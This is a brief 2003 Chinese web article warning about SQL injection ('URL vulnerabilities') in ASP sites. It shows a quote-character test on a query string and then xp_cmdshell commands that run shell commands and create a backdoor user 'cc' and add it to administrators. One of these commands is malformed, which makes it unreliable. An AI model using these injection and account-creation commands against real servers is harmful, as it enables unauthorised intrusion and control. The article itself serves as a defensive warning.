/* written by Jaron(賈俊) ,2003-11-04 */
/* 原出處:B/S WEB技術中文網 http://www.jaron.cn ;*/
/* 歡迎訪問我的網站: http://www.jaron.cn http://blog.jaron.cn*/
/* 如對本文有疑問,請在網站留言 /*
/* 轉載請註明出處和保留此版權信息 */
/* 歡迎使用SiteManager網站管理系統 http://sitemanager.cnzone.net http://demo.jaron.cn ; */
前些時候,公安機關破獲了一家網絡公司的程序被盜的案件,分析了一下,主要問題還是出在URL漏洞上。
測試程序是否存在URL漏洞,最簡單的方法就是在Request.QueryString上加一個',如 show.asp?id=1 ,改成 show.asp?id=1' ,打開IE高級選項中的“顯示友好HTTP錯誤信息”,看看是不是顯示了“字符串 '' 之前有未閉合的引號”?
如果數據庫是SQLSERVER,試試在查詢分析器裏執行以下指令:exec master.dbo.xp_cmdshell dir c:/
黑客便可利用exec master.dbo.xp_cmdshell 幹任何事情了,那麼利用這個指令,便很輕鬆的在您的系統內建立用戶 exec master.dbo.xp_cmdshell 'net user cc cc /add' ; exec master.dbo.xp_cmdshell 'net localhost administrators cc /add',以後的事情就不得而知了。
注: 非法侵入他人計算機系統,可能會被處以三年以下有期徒刑。